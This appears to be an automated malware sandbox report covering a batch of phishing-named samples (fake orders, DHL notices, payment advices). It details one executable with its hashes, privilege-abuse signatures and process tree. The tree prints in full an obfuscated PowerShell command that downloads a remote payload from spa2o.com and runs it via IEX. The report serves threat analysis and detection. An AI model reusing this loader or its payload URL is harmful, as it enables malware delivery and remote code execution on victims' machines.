Overview
overview
10Static
static
3IoC/00496083.xls
windows7-x64
3IoC/00496083.xls
windows10-2004-x64
1IoC/680589798891.xls
windows7-x64
3IoC/680589798891.xls
windows10-2004-x64
1Consignmen...df.exe
windows7-x64
10Consignmen...df.exe
windows10-2004-x64
10DHL SHIPME...PD.exe
windows7-x64
10DHL SHIPME...PD.exe
windows10-2004-x64
10EZ0496.exe
windows7-x64
10EZ0496.exe
windows10-2004-x64
10IoC/I05517...55.xls
windows7-x64
3IoC/I05517...55.xls
windows10-2004-x64
1IoC/I79540...11.xls
windows7-x64
3IoC/I79540...11.xls
windows10-2004-x64
1New Order ...22.exe
windows7-x64
10New Order ...22.exe
windows10-2004-x64
10$PLUGINSDIR/Math.dll
windows7-x64
3$PLUGINSDIR/Math.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3Windows.Sy...ns.dll
windows10-2004-x64
3systeminfo.exe
windows10-2004-x64
3wecutil.exe
windows10-2004-x64
3New order ...22.exe
windows7-x64
10New order ...22.exe
windows10-2004-x64
10PO_#YBIC38...py.exe
windows7-x64
3PO_#YBIC38...py.exe
windows10-2004-x64
3Payment Ad...2).exe
windows7-x64
10Payment Ad...2).exe
windows10-2004-x64
10IoC/XSG8996380.xls
windows7-x64
3IoC/XSG8996380.xls
windows10-2004-x64
1Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23-12-2024 21:57
Static task
static1
Behavioral task
behavioral1
Sample
IoC/00496083.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
IoC/00496083.xls
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
IoC/680589798891.xls
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
IoC/680589798891.xls
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Consignment Document.pdf.exe
Resource
win7-20240729-en
Behavioral task
behavioral6
Sample
Consignment Document.pdf.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
DHL SHIPMENT NOTIFICATION 284748395PD.exe
Resource
win7-20240708-en
Behavioral task
behavioral8
Sample
DHL SHIPMENT NOTIFICATION 284748395PD.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
EZ0496.exe
Resource
win7-20241023-en
Behavioral task
behavioral10
Sample
EZ0496.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
IoC/I055170_06975755.xls
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
IoC/I055170_06975755.xls
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
IoC/I795405_33242211.xls
Resource
win7-20241010-en
Behavioral task
behavioral14
Sample
IoC/I795405_33242211.xls
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
New Order 00027748585 02222022.exe
Resource
win7-20240729-en
Behavioral task
behavioral16
Sample
New Order 00027748585 02222022.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
$PLUGINSDIR/Math.dll
Resource
win7-20241010-en
Behavioral task
behavioral18
Sample
$PLUGINSDIR/Math.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240708-en
Behavioral task
behavioral20
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
Windows.System.Diagnostics.TraceReporting.PlatformDiagnosticActions.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral22
Sample
systeminfo.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
wecutil.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral24
Sample
New order 003848848575 02162022.exe
Resource
win7-20240903-en
Behavioral task
behavioral25
Sample
New order 003848848575 02162022.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral26
Sample
PO_#YBIC3892900183902328_Evaluated Copy.exe
Resource
win7-20241023-en
Behavioral task
behavioral27
Sample
PO_#YBIC3892900183902328_Evaluated Copy.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral28
Sample
Payment Advice for Outstanding Invoices (2).exe
Resource
win7-20240903-en
Behavioral task
behavioral29
Sample
Payment Advice for Outstanding Invoices (2).exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral30
Sample
IoC/XSG8996380.xls
Resource
win7-20240903-en
Behavioral task
behavioral31
Sample
IoC/XSG8996380.xls
Resource
win10v2004-20241007-en
General
-
Target
New order 003848848575 02162022.exe
-
Size
6KB
-
MD5
ec11df1acf1ce25da6daad0453d92f02
-
SHA1
a3eb5d8f63e6f6cc15445002d8deb7be47fd013a
-
SHA256
b8043f0e196bc7742dfe211a10481ddf844442a3c135de465494bdd619546ce3
-
SHA512
5271f51a9b89e5748e32dfdc1b302d968ecd0085d82cb1a0c1e9b867244599687051f1770798789db4e4fc9591953d4d734f3ab0a2b641fcb989880932ab779c
-
SSDEEP
96:WRkWOfaeOVMwsO4JdjC/oI0HIGrqW0zNt:dDBlJJDISIib+
Malware Config
Extracted
http://spa2o.com/H99.jpg
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 6 2292 powershell.exe 7 2292 powershell.exe 8 2292 powershell.exe -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 2292 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2292 powershell.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 2292 powershell.exe Token: SeIncreaseQuotaPrivilege 2292 powershell.exe Token: SeSecurityPrivilege 2292 powershell.exe Token: SeTakeOwnershipPrivilege 2292 powershell.exe Token: SeLoadDriverPrivilege 2292 powershell.exe Token: SeSystemProfilePrivilege 2292 powershell.exe Token: SeSystemtimePrivilege 2292 powershell.exe Token: SeProfSingleProcessPrivilege 2292 powershell.exe Token: SeIncBasePriorityPrivilege 2292 powershell.exe Token: SeCreatePagefilePrivilege 2292 powershell.exe Token: SeBackupPrivilege 2292 powershell.exe Token: SeRestorePrivilege 2292 powershell.exe Token: SeShutdownPrivilege 2292 powershell.exe Token: SeDebugPrivilege 2292 powershell.exe Token: SeSystemEnvironmentPrivilege 2292 powershell.exe Token: SeRemoteShutdownPrivilege 2292 powershell.exe Token: SeUndockPrivilege 2292 powershell.exe Token: SeManageVolumePrivilege 2292 powershell.exe Token: 33 2292 powershell.exe Token: 34 2292 powershell.exe Token: 35 2292 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1044 wrote to memory of 2292 1044 New order 003848848575 02162022.exe 28 PID 1044 wrote to memory of 2292 1044 New order 003848848575 02162022.exe 28 PID 1044 wrote to memory of 2292 1044 New order 003848848575 02162022.exe 28
Processes
-
C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe"C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|IEX;do {$ping = test-connection -comp google.com -count 1 -Quiet} until($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|I`E`X;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing', [Microsoft.VisualBasic.CallType]::Method,'http' + '://spa2o.com/H99.jpg')|I`E`X2⤵
- Blocklisted process makes network request
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2292
-